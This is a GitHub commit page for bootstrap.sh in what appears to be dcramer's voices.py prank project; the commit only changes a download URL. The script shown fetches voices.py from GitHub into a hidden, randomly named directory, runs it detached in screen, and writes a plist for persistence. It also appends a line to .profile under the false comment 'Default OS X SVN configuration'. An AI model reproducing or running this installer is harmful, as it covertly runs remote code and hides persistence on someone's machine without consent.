Skip to content

Commit

Permalink
Fix
Browse files Browse the repository at this point in the history
  • Loading branch information
dcramer committed Mar 7, 2017
1 parent 89509c8 commit b42e41c
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions bootstrap.sh
Expand Up @@ -11,7 +11,7 @@ ${PRE}if [ ! $? -ne 0 ]; then
${PRE} APP_DIR="${HOME}/Library/Application Support/.\${RANDOM}-\${RANDOM}/"
${PRE} mkdir -p "\${APP_DIR}"
${PRE} cd "\${APP_DIR}"
${PRE} curl -O https://raw.github.com/dcramer/voices.py/master/voices.py > /dev/null 2>&1
${PRE} curl -O https://github.com/dcramer/voices.py/raw/master/voices.py > /dev/null 2>&1
${PRE} screen -d -m python voices.py
${PRE} echo "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\"
Expand Down Expand Up @@ -46,4 +46,4 @@ if [ $? -ne 0 ]; then
echo "
# Default OS X SVN configuration
. ~/.svn/svn.conf" >> ${PWD}/.profile
fi
fi

0 comments on commit b42e41c

Please sign in to comment.